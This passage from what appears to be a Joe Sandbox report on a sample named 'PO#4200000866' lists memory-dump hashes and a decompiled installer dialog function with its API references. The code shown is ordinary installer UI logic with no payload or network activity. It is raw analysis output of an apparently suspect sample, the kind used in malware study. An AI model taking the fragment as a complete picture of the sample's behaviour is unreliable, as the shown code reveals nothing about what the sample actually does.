                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c046250db1975263b302e7e2825c997930d9edf13abd6c1dae50a1a845d86716
                                                                                      • Instruction ID: f9259627293a43493e5596427519d0ec91f67cf891757cd4c34577ecfd5cc9f7
                                                                                      • Opcode Fuzzy Hash: c046250db1975263b302e7e2825c997930d9edf13abd6c1dae50a1a845d86716
                                                                                      • Instruction Fuzzy Hash: EC31347A6003499FDB39CF2985A07EA33F6EF55790F86802DDC89DB640D7349D848B02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5a7589fdf1b5d6bfd5d55673ebeba3dc121157ba6750a22f8a3367a2abbd4789
                                                                                      • Instruction ID: c5e972db0f7a7e43ffa26b3b57cc0163bdc680cd8f546322828e50b99b8b2fd9
                                                                                      • Opcode Fuzzy Hash: 5a7589fdf1b5d6bfd5d55673ebeba3dc121157ba6750a22f8a3367a2abbd4789
                                                                                      • Instruction Fuzzy Hash: 612156296042969FCF258F3CC5257E67FF39F16744FA645AECCC9CB510D73588498A02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 72e5272656ce8cffb2d0b954b73e6dbd29b52812667e30d80e41db003f400efc
                                                                                      • Instruction ID: ad6cc301f74831d915c80918c0b918a0ee61ffb18a71a074b209fb45730b73eb
                                                                                      • Opcode Fuzzy Hash: 72e5272656ce8cffb2d0b954b73e6dbd29b52812667e30d80e41db003f400efc
                                                                                      • Instruction Fuzzy Hash: 983136316043869FCF389E28CC257FA7BA2AF56744F99061EECCA9B610DB314651CF52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 427ba20837c9ec716c3707f7eece39479f584f9a4504086b2a1b84e0c7140129
                                                                                      • Instruction ID: 2813a3a41b8c53f49f6e31b97bbfca45536cf83172944b40e4adeb1fdb19244f
                                                                                      • Opcode Fuzzy Hash: 427ba20837c9ec716c3707f7eece39479f584f9a4504086b2a1b84e0c7140129
                                                                                      • Instruction Fuzzy Hash: FF317A79604305DBCF24DF2686D5396BBB6EF95350F68C089CC89CF109D3349A84CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 809bfa9120b02579c047b19c8d505264007d600b1153bdb060a666474f6e0ef0
                                                                                      • Instruction ID: 490bd066d7ef0bfb50799c5e1bd9acf3b008b2ba945a748d3d2b888aaaef0e0f
                                                                                      • Opcode Fuzzy Hash: 809bfa9120b02579c047b19c8d505264007d600b1153bdb060a666474f6e0ef0
                                                                                      • Instruction Fuzzy Hash: B711253A9007158FCB29CF2582507D773F7EF55B90F968059CC89DB210E3389D888642
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 46880bfd6f36d427e1a0ce0ab1b031306d682d609ce8f794dbe111b9eed2d3a5
                                                                                      • Instruction ID: 0cfb1574cf787d3fd291e6213cfd2e051166268843597c5e363411e30fc8299d
                                                                                      • Opcode Fuzzy Hash: 46880bfd6f36d427e1a0ce0ab1b031306d682d609ce8f794dbe111b9eed2d3a5
                                                                                      • Instruction Fuzzy Hash: 1F115B74600355CFCB38EF29C998ADA73F1BF58715F89456AE94ACF262C330AB41CA15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82b11ddd430f10ab3df3de2f33f35c741ad07d1531c21e271ba6092a5293bb8a
                                                                                      • Instruction ID: 5a17f9621958ae5d4d6a6e51ad8ac152e5204fa7002e8e7f0b498e2f003d202d
                                                                                      • Opcode Fuzzy Hash: 82b11ddd430f10ab3df3de2f33f35c741ad07d1531c21e271ba6092a5293bb8a
                                                                                      • Instruction Fuzzy Hash: 2FB092F2551581ABFF02CB08DAC2BC033F8F304A58F0808A8E002DBA10D22CFA00CA00
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c1042a7c0f758b3b5f9762a8c7bc12c684ab381638fd8767c07bf2fe8488e910
                                                                                      • Instruction ID: d5b8bbef47df995cf152d4f883d2dec6759fbd3335b13e848298dc804d675041
                                                                                      • Opcode Fuzzy Hash: c1042a7c0f758b3b5f9762a8c7bc12c684ab381638fd8767c07bf2fe8488e910
                                                                                      • Instruction Fuzzy Hash: F7B09278225640CFC645CF0AC180E4073B4FB08688F8908C0E892CBA21C328E9018910
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 96%
                                                                                      			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                      				struct HWND__* _v8;
                                                                                      				struct HWND__* _v12;
                                                                                      				long _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				signed char* _v32;
                                                                                      				int _v36;
                                                                                      				signed int _v44;
                                                                                      				int _v48;
                                                                                      				signed int* _v60;
                                                                                      				signed char* _v64;
                                                                                      				signed int _v68;
                                                                                      				long _v72;
                                                                                      				void* _v76;
                                                                                      				intOrPtr _v80;
                                                                                      				intOrPtr _v84;
                                                                                      				void* _v88;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t198;
                                                                                      				intOrPtr _t201;
                                                                                      				long _t207;
                                                                                      				signed int _t211;
                                                                                      				signed int _t222;
                                                                                      				void* _t225;
                                                                                      				void* _t226;
                                                                                      				int _t232;
                                                                                      				long _t237;
                                                                                      				long _t238;
                                                                                      				signed int _t239;
                                                                                      				signed int _t245;
                                                                                      				signed int _t247;
                                                                                      				signed char _t248;
                                                                                      				signed char _t254;
                                                                                      				void* _t258;
                                                                                      				void* _t260;
                                                                                      				signed char* _t278;
                                                                                      				signed char _t279;
                                                                                      				long _t284;
                                                                                      				struct HWND__* _t291;
                                                                                      				signed int* _t292;
                                                                                      				int _t293;
                                                                                      				long _t294;
                                                                                      				signed int _t295;
                                                                                      				void* _t297;
                                                                                      				long _t298;
                                                                                      				int _t299;
                                                                                      				signed int _t300;
                                                                                      				signed int _t303;
                                                                                      				signed int _t311;
                                                                                      				signed char* _t319;
                                                                                      				int _t324;
                                                                                      				void* _t326;
                                                                                      
                                                                                      				_t291 = _a4;
                                                                                      				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                      				_v8 = GetDlgItem(_t291, 0x408);
                                                                                      				_t326 = SendMessageW;
                                                                                      				_v24 =  *0x42a288;
                                                                                      				_v28 =  *0x42a270 + 0x94;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					L23:
                                                                                      					if(_a8 != 0x405) {
                                                                                      						_t301 = _a16;
                                                                                      					} else {
                                                                                      						_a12 = 0;
                                                                                      						_t301 = 1;
                                                                                      						_a8 = 0x40f;
                                                                                      						_a16 = 1;
                                                                                      					}
                                                                                      					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                      						_v16 = _t301;
                                                                                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                      							if(( *0x42a279 & 0x00000002) != 0) {
                                                                                      								L41:
                                                                                      								if(_v16 != 0) {
                                                                                      									_t237 = _v16;
                                                                                      									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                      										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                      									}
                                                                                      									_t238 = _v16;
                                                                                      									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                      										_t301 = _v24;
                                                                                      										_t239 =  *(_t238 + 0x5c);
                                                                                      										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                      											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                      										} else {
                                                                                      											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								goto L48;
                                                                                      							}
                                                                                      							if(_a8 == 0x413) {
                                                                                      								L33:
                                                                                      								_t301 = 0 | _a8 != 0x00000413;
                                                                                      								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                                                      								_t295 = _t245;
                                                                                      								if(_t295 >= 0) {
                                                                                      									_t94 = _v24 + 8; // 0x8
                                                                                      									_t301 = _t245 * 0x818 + _t94;
                                                                                      									_t247 =  *_t301;
                                                                                      									if((_t247 & 0x00000010) == 0) {
                                                                                      										if((_t247 & 0x00000040) == 0) {
                                                                                      											_t248 = _t247 ^ 0x00000001;
                                                                                      										} else {
                                                                                      											_t254 = _t247 ^ 0x00000080;
                                                                                      											if(_t254 >= 0) {
                                                                                      												_t248 = _t254 & 0x000000fe;
                                                                                      											} else {
                                                                                      												_t248 = _t254 | 0x00000001;
                                                                                      											}
                                                                                      										}
                                                                                      										 *_t301 = _t248;
                                                                                      										E0040117D(_t295);
                                                                                      										_a12 = _t295 + 1;
                                                                                      										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                                                      										_a8 = 0x40f;
                                                                                      									}
                                                                                      								}
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							_t301 = _a16;
                                                                                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                      								goto L41;
                                                                                      							}
                                                                                      							goto L33;
                                                                                      						} else {
                                                                                      							goto L48;
                                                                                      						}
                                                                                      					} else {
                                                                                      						L48:
                                                                                      						if(_a8 != 0x111) {
                                                                                      							L56:
                                                                                      							if(_a8 == 0x200) {
                                                                                      								SendMessageW(_v8, 0x200, 0, 0);
                                                                                      							}
                                                                                      							if(_a8 == 0x40b) {
                                                                                      								_t225 =  *0x42372c;
                                                                                      								if(_t225 != 0) {
                                                                                      									ImageList_Destroy(_t225);
                                                                                      								}
                                                                                      								_t226 =  *0x423740;
                                                                                      								if(_t226 != 0) {
                                                                                      									GlobalFree(_t226);
                                                                                      								}
                                                                                      								 *0x42372c = 0;
                                                                                      								 *0x423740 = 0;
                                                                                      								 *0x42a2c0 = 0;
                                                                                      							}
                                                                                      							if(_a8 != 0x40f) {
                                                                                      								L90:
                                                                                      								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                                                      									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                      									ShowWindow(_v8, _t324);
                                                                                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                      								}
                                                                                      								goto L93;
                                                                                      							} else {
                                                                                      								E004011EF(_t301, 0, 0);
                                                                                      								_t198 = _a12;
                                                                                      								if(_t198 != 0) {
                                                                                      									if(_t198 != 0xffffffff) {
                                                                                      										_t198 = _t198 - 1;
                                                                                      									}
                                                                                      									_push(_t198);
                                                                                      									_push(8);
                                                                                      									E00404FFF();
                                                                                      								}
                                                                                      								if(_a16 == 0) {
                                                                                      									L75:
                                                                                      									E004011EF(_t301, 0, 0);
                                                                                      									_v36 =  *0x423740;
                                                                                      									_t201 =  *0x42a288;
                                                                                      									_v64 = 0xf030;
                                                                                      									_v24 = 0;
                                                                                      									if( *0x42a28c <= 0) {
                                                                                      										L86:
                                                                                      										if( *0x42a31e == 0x400) {
                                                                                      											InvalidateRect(_v8, 0, 1);
                                                                                      										}
                                                                                      										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                                                      											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                                                      										}
                                                                                      										goto L90;
                                                                                      									}
                                                                                      									_t292 = _t201 + 8;
                                                                                      									do {
                                                                                      										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                      										if(_t207 != 0) {
                                                                                      											_t303 =  *_t292;
                                                                                      											_v72 = _t207;
                                                                                      											_v76 = 8;
                                                                                      											if((_t303 & 0x00000001) != 0) {
                                                                                      												_v76 = 9;
                                                                                      												_v60 =  &(_t292[4]);
                                                                                      												_t292[0] = _t292[0] & 0x000000fe;
                                                                                      											}
                                                                                      											if((_t303 & 0x00000040) == 0) {
                                                                                      												_t211 = (_t303 & 0x00000001) + 1;
                                                                                      												if((_t303 & 0x00000010) != 0) {
                                                                                      													_t211 = _t211 + 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												_t211 = 3;
                                                                                      											}
                                                                                      											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                      											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                      											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                      										}
                                                                                      										_v24 = _v24 + 1;
                                                                                      										_t292 =  &(_t292[0x206]);
                                                                                      									} while (_v24 <  *0x42a28c);
                                                                                      									goto L86;
                                                                                      								} else {
                                                                                      									_t293 = E004012E2( *0x423740);
                                                                                      									E00401299(_t293);
                                                                                      									_t222 = 0;
                                                                                      									_t301 = 0;
                                                                                      									if(_t293 <= 0) {
                                                                                      										L74:
                                                                                      										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                      										_a16 = _t293;
                                                                                      										_a8 = 0x420;
                                                                                      										goto L75;
                                                                                      									} else {
                                                                                      										goto L71;
                                                                                      									}
                                                                                      									do {
                                                                                      										L71:
                                                                                      										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                      											_t301 = _t301 + 1;
                                                                                      										}
                                                                                      										_t222 = _t222 + 1;
                                                                                      									} while (_t222 < _t293);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                      							goto L93;
                                                                                      						} else {
                                                                                      							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                      							if(_t232 == 0xffffffff) {
                                                                                      								goto L93;
                                                                                      							}
                                                                                      							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                      							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                      								_t294 = 0x20;
                                                                                      							}
                                                                                      							E00401299(_t294);
                                                                                      							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                      							_a12 = _a12 | 0xffffffff;
                                                                                      							_a16 = 0;
                                                                                      							_a8 = 0x40f;
                                                                                      							goto L56;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					_v36 = 0;
                                                                                      					_v20 = 2;
                                                                                      					 *0x42a2c0 = _t291;
                                                                                      					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                                      					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                                                      					 *0x423734 =  *0x423734 | 0xffffffff;
                                                                                      					_t297 = _t258;
                                                                                      					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                                                      					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                      					 *0x42372c = _t260;
                                                                                      					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                      					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                                                      					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                      						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                      					}
                                                                                      					DeleteObject(_t297);
                                                                                      					_t298 = 0;
                                                                                      					do {
                                                                                      						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                      						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                      							if(_t298 != 0x20) {
                                                                                      								_v20 = 0;
                                                                                      							}
                                                                                      							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                      						}
                                                                                      						_t298 = _t298 + 1;
                                                                                      					} while (_t298 < 0x21);
                                                                                      					_t299 = _a16;
                                                                                      					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                      					_push(0x15);
                                                                                      					E004045C4(_a4);
                                                                                      					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                      					_push(0x16);
                                                                                      					E004045C4(_a4);
                                                                                      					_t300 = 0;
                                                                                      					_v16 = 0;
                                                                                      					if( *0x42a28c <= 0) {
                                                                                      						L19:
                                                                                      						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						_t319 = _v24 + 8;
                                                                                      						_v32 = _t319;
                                                                                      						do {
                                                                                      							_t278 =  &(_t319[0x10]);
                                                                                      							if( *_t278 != 0) {
                                                                                      								_v64 = _t278;
                                                                                      								_t279 =  *_t319;
                                                                                      								_v88 = _v16;
                                                                                      								_t311 = 0x20;
                                                                                      								_v84 = 0xffff0002;
                                                                                      								_v80 = 0xd;
                                                                                      								_v68 = _t311;
                                                                                      								_v44 = _t300;
                                                                                      								_v72 = _t279 & _t311;
                                                                                      								if((_t279 & 0x00000002) == 0) {
                                                                                      									if((_t279 & 0x00000004) == 0) {
                                                                                      										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                      									} else {
                                                                                      										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                      									}
                                                                                      								} else {
                                                                                      									_v80 = 0x4d;
                                                                                      									_v48 = 1;
                                                                                      									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                      									_v36 = 1;
                                                                                      									 *( *0x423740 + _t300 * 4) = _t284;
                                                                                      									_v16 =  *( *0x423740 + _t300 * 4);
                                                                                      								}
                                                                                      							}
                                                                                      							_t300 = _t300 + 1;
                                                                                      							_t319 =  &(_v32[0x818]);
                                                                                      							_v32 = _t319;
                                                                                      						} while (_t300 <  *0x42a28c);
                                                                                      						if(_v36 != 0) {
                                                                                      							L20:
                                                                                      							if(_v20 != 0) {
                                                                                      								E004045F9(_v8);
                                                                                      								goto L23;
                                                                                      							} else {
                                                                                      								ShowWindow(_v12, 5);
                                                                                      								E004045F9(_v12);
                                                                                      								L93:
                                                                                      								return E0040462B(_a8, _a12, _a16);
                                                                                      							}
                                                                                      						}
                                                                                      						goto L19;
                                                                                      					}
                                                                                      				}
                                                                                      			}


























































                                                                                      0x00405038
                                                                                      0x00405051
                                                                                      0x00405056
                                                                                      0x0040505e
                                                                                      0x00405064
                                                                                      0x0040507a
                                                                                      0x0040507d
                                                                                      0x004052a8
                                                                                      0x004052af
                                                                                      0x004052c3
                                                                                      0x004052b1
                                                                                      0x004052b3
                                                                                      0x004052b6
                                                                                      0x004052b7
                                                                                      0x004052be
                                                                                      0x004052be
                                                                                      0x004052cf
                                                                                      0x004052dd
                                                                                      0x004052e0
                                                                                      0x004052f6
                                                                                      0x0040536b
                                                                                      0x0040536e
                                                                                      0x00405370
                                                                                      0x0040537a
                                                                                      0x00405388
                                                                                      0x00405388
                                                                                      0x0040538a
                                                                                      0x00405394
                                                                                      0x0040539a
                                                                                      0x0040539d
                                                                                      0x004053a0
                                                                                      0x004053bb
                                                                                      0x004053a2
                                                                                      0x004053ac
                                                                                      0x004053ac
                                                                                      0x004053a0
                                                                                      0x00405394
                                                                                      0x00000000
                                                                                      0x0040536e
                                                                                      0x004052fb
                                                                                      0x00405306
                                                                                      0x0040530b
                                                                                      0x00405312
                                                                                      0x00405317
                                                                                      0x0040531b
                                                                                      0x00405326
                                                                                      0x00405326
                                                                                      0x0040532a
                                                                                      0x0040532e
                                                                                      0x00405332
                                                                                      0x00405345
                                                                                      0x00405334
                                                                                      0x00405334
                                                                                      0x0040533b
                                                                                      0x00405341
                                                                                      0x0040533d
                                                                                      0x0040533d
                                                                                      0x0040533d
                                                                                      0x0040533b
                                                                                      0x00405349
                                                                                      0x0040534b
                                                                                      0x0040535e
                                                                                      0x00405361
                                                                                      0x00405364
                                                                                      0x00405364
                                                                                      0x0040532e
                                                                                      0x00000000
                                                                                      0x0040531b
                                                                                      0x004052fd
                                                                                      0x00405304
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004053be
                                                                                      0x004053be
                                                                                      0x004053c5
                                                                                      0x00405436
                                                                                      0x0040543e
                                                                                      0x00405446
                                                                                      0x00405446
                                                                                      0x0040544f
                                                                                      0x00405451
                                                                                      0x00405458
                                                                                      0x0040545b
                                                                                      0x0040545b
                                                                                      0x00405461
                                                                                      0x00405468
                                                                                      0x0040546b
                                                                                      0x0040546b
                                                                                      0x00405471
                                                                                      0x00405477
                                                                                      0x0040547d
                                                                                      0x0040547d
                                                                                      0x0040548a
                                                                                      0x004055eb
                                                                                      0x004055f2
                                                                                      0x0040560f
                                                                                      0x00405615
                                                                                      0x00405627
                                                                                      0x00405627
                                                                                      0x00000000
                                                                                      0x00405490
                                                                                      0x00405492
                                                                                      0x00405497
                                                                                      0x0040549c
                                                                                      0x004054a1
                                                                                      0x004054a3
                                                                                      0x004054a3
                                                                                      0x004054a4
                                                                                      0x004054a5
                                                                                      0x004054a7
                                                                                      0x004054a7
                                                                                      0x004054af
                                                                                      0x004054f0
                                                                                      0x004054f2
                                                                                      0x00405502
                                                                                      0x00405505
                                                                                      0x0040550a
                                                                                      0x00405511
                                                                                      0x00405514
                                                                                      0x004055b6
                                                                                      0x004055bf
                                                                                      0x004055c7
                                                                                      0x004055c7
                                                                                      0x004055d5
                                                                                      0x004055e6
                                                                                      0x004055e6
                                                                                      0x00000000
                                                                                      0x004055d5
                                                                                      0x0040551a
                                                                                      0x0040551d
                                                                                      0x00405523
                                                                                      0x00405528
                                                                                      0x0040552a
                                                                                      0x0040552c
                                                                                      0x00405532
                                                                                      0x00405539
                                                                                      0x0040553e
                                                                                      0x00405545
                                                                                      0x00405548
                                                                                      0x00405548
                                                                                      0x0040554f
                                                                                      0x0040555b
                                                                                      0x0040555f
                                                                                      0x00405561
                                                                                      0x00405561
                                                                                      0x00405551
                                                                                      0x00405553
                                                                                      0x00405553
                                                                                      0x00405581
                                                                                      0x0040558d
                                                                                      0x0040559c
                                                                                      0x0040559c
                                                                                      0x0040559e
                                                                                      0x004055a1
                                                                                      0x004055aa
                                                                                      0x00000000
                                                                                      0x004054b1
                                                                                      0x004054bc
                                                                                      0x004054bf
                                                                                      0x004054c4
                                                                                      0x004054c6
                                                                                      0x004054ca
                                                                                      0x004054da
                                                                                      0x004054e4
                                                                                      0x004054e6
                                                                                      0x004054e9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004054cc
                                                                                      0x004054cc
                                                                                      0x004054d2
                                                                                      0x004054d4
                                                                                      0x004054d4
                                                                                      0x004054d5
                                                                                      0x004054d6
                                                                                      0x00000000
                                                                                      0x004054cc
                                                                                      0x004054af
                                                                                      0x0040548a
                                                                                      0x004053cd
                                                                                      0x00000000
                                                                                      0x004053e3
                                                                                      0x004053ed
                                                                                      0x004053f2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405404
                                                                                      0x00405409
                                                                                      0x00405415
                                                                                      0x00405415
                                                                                      0x00405417
                                                                                      0x00405426
                                                                                      0x00405428
                                                                                      0x0040542c
                                                                                      0x0040542f
                                                                                      0x00000000
                                                                                      0x0040542f
                                                                                      0x004053cd
                                                                                      0x00405083
                                                                                      0x00405088
                                                                                      0x00405091
                                                                                      0x00405098
                                                                                      0x004050aa
                                                                                      0x004050b5
                                                                                      0x004050bb
                                                                                      0x004050c9
                                                                                      0x004050dd
                                                                                      0x004050e2
                                                                                      0x004050ef
                                                                                      0x004050f4
                                                                                      0x0040510a
                                                                                      0x0040511b
                                                                                      0x00405128
                                                                                      0x00405128
                                                                                      0x0040512b
                                                                                      0x00405131
                                                                                      0x00405133
                                                                                      0x00405136
                                                                                      0x0040513b
                                                                                      0x00405140
                                                                                      0x00405142
                                                                                      0x00405142
                                                                                      0x00405162
                                                                                      0x00405162
                                                                                      0x00405164
                                                                                      0x00405165
                                                                                      0x0040516a
                                                                                      0x00405170
                                                                                      0x00405174
                                                                                      0x00405179
                                                                                      0x00405181
                                                                                      0x00405185
                                                                                      0x0040518a
                                                                                      0x0040518f
                                                                                      0x00405197
                                                                                      0x0040519a
                                                                                      0x0040526a
                                                                                      0x0040527d
                                                                                      0x00000000
                                                                                      0x004051a0
                                                                                      0x004051a3
                                                                                      0x004051a6
                                                                                      0x004051a9
                                                                                      0x004051a9
                                                                                      0x004051af
                                                                                      0x004051b8
                                                                                      0x004051bb
                                                                                      0x004051bf
                                                                                      0x004051c2
                                                                                      0x004051c5
                                                                                      0x004051ce
                                                                                      0x004051d7
                                                                                      0x004051da
                                                                                      0x004051dd
                                                                                      0x004051e0
                                                                                      0x0040521e
                                                                                      0x00405249
                                                                                      0x00405220
                                                                                      0x0040522f
                                                                                      0x0040522f
                                                                                      0x004051e2
                                                                                      0x004051e5
                                                                                      0x004051f3
                                                                                      0x004051fd
                                                                                      0x00405205
                                                                                      0x0040520c
                                                                                      0x00405217
                                                                                      0x00405217
                                                                                      0x004051e0
                                                                                      0x0040524f
                                                                                      0x00405250
                                                                                      0x0040525c
                                                                                      0x0040525c
                                                                                      0x00405268
                                                                                      0x00405283
                                                                                      0x00405286
                                                                                      0x004052a3
                                                                                      0x00000000
                                                                                      0x00405288
                                                                                      0x0040528d
                                                                                      0x00405296
                                                                                      0x00405629
                                                                                      0x0040563b
                                                                                      0x0040563b
                                                                                      0x00405286
                                                                                      0x00000000
                                                                                      0x00405268
                                                                                      0x0040519a

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                                                      • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
